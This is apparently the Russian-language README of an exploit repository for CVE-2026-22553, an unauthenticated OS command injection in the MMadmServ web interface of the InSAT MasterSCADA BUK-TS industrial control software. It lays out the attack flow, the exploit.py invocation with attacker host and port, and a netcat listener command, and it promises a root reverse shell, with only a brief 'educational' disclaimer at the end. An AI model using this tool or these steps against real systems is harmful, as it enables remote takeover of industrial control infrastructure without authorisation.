
Эксплойт неаутентифицированной инъекции команд в ОС для веб-интерфейса InSAT MasterSCADA BUK-TS MMadmServ. Доставляет обратную оболочку с правами root через HTTP POST-запрос. Критичность CVSS 9.8.
CVE-2026-22553 | CVSS 9.8 Critical| Автор эксплойта: Mohammed Idrees Banyamer
InSAT MasterSCADA BUK-TS содержит уязвимость инъекции команд ОС без аутентификации (OS Command Injection) в веб-интерфейсе MMadmServ. Эта ошибка позволяет удалённым злоумышленникам добиться полного удалённого выполнения кода (RCE) без какой-либо аутентификации.
flowchart TD
A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
B -->|Unauthenticated| C[Vulnerable Parameter]
C -->|OS Command Injection| D[Command Execution on Target Server]
D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
style A fill:#ff4d4d,stroke:#fff
style E fill:#4dff88,stroke:#fffpython3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444
| Параметр | Описание |
|---|---|
target | Целевой URL (например, http://ip:port) |
--lhost | Ваш IP-адрес (reverse shell) |
--lport | Ваш порт для прослушивания |
Запустите слушатель на вашей машине:
nc -lvnp 4444
Запустите эксплойт:
python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
Получите reverse shell с правами root/system.
Данный эксплойт предоставлен исключительно в образовательных целях и для авторизованного тестирования на проникновение.
Несанкционированное использование против систем, которые вам не принадлежат, противозаконно и может нарушать международное законодательство.
Автор не несёт ответственности за любое неправомерное использование.
Mohammed Idrees Banyamer
Поставьте ⭐ этому репозиторию, если он оказался полезным!